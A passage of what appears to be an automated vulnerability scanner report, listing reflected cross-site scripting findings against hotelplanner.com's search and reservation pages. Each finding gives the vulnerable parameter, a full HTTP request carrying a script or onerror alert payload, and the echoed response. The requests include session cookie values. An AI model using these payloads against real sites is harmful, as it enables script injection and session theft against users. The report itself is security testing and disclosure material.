Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; LANGUAGE=1; SCREENWIDTH=1920; SCREENHEIGHT=1200; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.1.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:23:02 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 230487


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
pen(this, '', 'http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113c7a9e"><script>alert(1)</script>75d130eda71&btnGo.y=15', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...
4.273. http://www.hotelplanner.com/Search/index.cfm [btnGo.y parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/index.cfm

Issue detail

The value of the btnGo.y request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84317"><script>alert(1)</script>80ec618c45b was submitted in the btnGo.y parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=1584317"><script>alert(1)</script>80ec618c45b HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; LANGUAGE=1; SCREENWIDTH=1920; SCREENHEIGHT=1200; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.1.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:23:09 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 230487


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
', 'http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=1584317"><script>alert(1)</script>80ec618c45b', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...
4.274. https://www.hotelplanner.com/Accept/Reserve.cfm [DisplayNightlyRates parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the DisplayNightlyRates request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c814"><script>alert(1)</script>9dd40173679 was submitted in the DisplayNightlyRates parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
SD&extraPersonFees=&chargeableRoomRateTaxesAndFees=205.99&chargeableRoomRateTotal=1434.2&displayRoomRate=1434.2&NativeNightlyRates=429.49%2C429.49%2C369.23&DisplayNightlyRates=429.49%2C429.49%2C369.231c814"><script>alert(1)</script>9dd40173679&displayCurrencyCode=USD&promoType=&propertyID=15159&promoDescription=&immediateChargeRequired=true&depositRequired=true&guaranteeRequired=false&rateChange=true&taxRate=205.99&propertyType=H&supplierT
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:35:10 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="DisplayNightlyRates" value="429.49,429.49,369.231c814"><script>alert(1)</script>9dd40173679">
...[SNIP]...
4.275. https://www.hotelplanner.com/Accept/Reserve.cfm [HotelName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the HotelName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a147e"><script>alert(1)</script>41fbb640098 was submitted in the HotelName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
6+Canada%29%29+on+Oct+3%2C+2011+are+subject+to+a+1+Night+Room+%26+Tax+penalty.+The+property+makes+no+refunds+for+no+shows+or+early+checkouts.&hotelID=113791&HotelName=MILLENNIUM+BOSTONIAN+HOTEL+BOSTONa147e"><script>alert(1)</script>41fbb640098&bookIt.x=100&bookIt.y=33

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:36:41 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58910

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<img src="//cdn.hotelplanner.com/Common/Images/Chains/MU.gif" width="108" height="108" border="0" alt="millennium bostonian hotel bostona147e"><script>alert(1)</script>41fbb640098 Logo" hspace="0">
...[SNIP]...
4.276. https://www.hotelplanner.com/Accept/Reserve.cfm [NativeNightlyRates parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the NativeNightlyRates request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d060"><script>alert(1)</script>412c45cdb9b was submitted in the NativeNightlyRates parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPersonFees=&chargeableRoomRateTaxesAndFees=205.99&chargeableRoomRateTotal=1434.2&displayRoomRate=1434.2&NativeNightlyRates=429.49%2C429.49%2C369.236d060"><script>alert(1)</script>412c45cdb9b&DisplayNightlyRates=429.49%2C429.49%2C369.23&displayCurrencyCode=USD&promoType=&propertyID=15159&promoDescription=&immediateChargeRequired=true&depositRequired=true&guaranteeRequired=false&rateChange
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:35:06 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58862

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="NativeNightlyRates" value="429.49,429.49,369.236d060"><script>alert(1)</script>412c45cdb9b">
...[SNIP]...
4.277. https://www.hotelplanner.com/Accept/Reserve.cfm [ValueAdds parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the ValueAdds request parameter is copied into the HTML document as plain text between tags. The payload afb9f<script>alert(1)</script>5108f199c4a was submitted in the ValueAdds parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
ed=false&rateChange=true&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+Bed&bedType=14&rateDescription=Superior+Room+1+King+Bed&ValueAdds=afb9f<script>alert(1)</script>5108f199c4a&hrnQuoteKey=9f715d9d-c49b-4dea-841d-bf8e7f684953&roomTypeCode=200034536&rateCode=200205712&cancellationPolicy=We+understand+that+sometimes+plans+fall+through.+We+do+not+charge+a+change+or+cancel+fee.
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:36:16 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 59048

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<font color="3865a8">Includes afb9f<script>alert(1)</script>5108f199c4a!</font>
...[SNIP]...
4.278. https://www.hotelplanner.com/Accept/Reserve.cfm [ValueAdds parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the ValueAdds request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbbfc"><script>alert(1)</script>cfa93721e10 was submitted in the ValueAdds parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
ed=false&rateChange=true&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+Bed&bedType=14&rateDescription=Superior+Room+1+King+Bed&ValueAdds=bbbfc"><script>alert(1)</script>cfa93721e10&hrnQuoteKey=9f715d9d-c49b-4dea-841d-bf8e7f684953&roomTypeCode=200034536&rateCode=200205712&cancellationPolicy=We+understand+that+sometimes+plans+fall+through.+We+do+not+charge+a+change+or+cancel+fee.
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:36:15 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 59052

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="ValueAdds" value="bbbfc"><script>alert(1)</script>cfa93721e10">
...[SNIP]...
4.279. https://www.hotelplanner.com/Accept/Reserve.cfm [arrivalDay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the arrivalDay request parameter is copied into an HTML comment. The payload a8493--><img%20src%3da%20onerror%3dalert(1)>bf087f08db was submitted in the arrivalDay parameter. This input was echoed as a8493--><img src=a onerror=alert(1)>bf087f08db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4a8493--><img%20src%3da%20onerror%3dalert(1)>bf087f08db&arrivalMonth=9&arrivalYear=2011&rateFrequency=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPersonFees=&chargeableRoomRateTaxesAndFees=205.99&chargeableRoomRateTotal=1434.2&displayRoomRate=1434
...[SNIP]...

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:33:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<!--

Diagnostic Information:
10/4a8493--><img src=a onerror=alert(1)>bf087f08db/2011 is an invalid date or time string. <br>
...[SNIP]...
4.280. https://www.hotelplanner.com/Accept/Reserve.cfm [arrivalMonth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the arrivalMonth request parameter is copied into an HTML comment. The payload 3267a--><img%20src%3da%20onerror%3dalert(1)>1be035142f8 was submitted in the arrivalMonth parameter. This input was echoed as 3267a--><img src=a onerror=alert(1)>1be035142f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=93267a--><img%20src%3da%20onerror%3dalert(1)>1be035142f8&arrivalYear=2011&rateFrequency=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPersonFees=&chargeableRoomRateTaxesAndFees=205.99&chargeableRoomRateTotal=1434.2&displayRoomRate=1434.2&NativeNightl
...[SNIP]...

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:33:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<!--

Diagnostic Information:
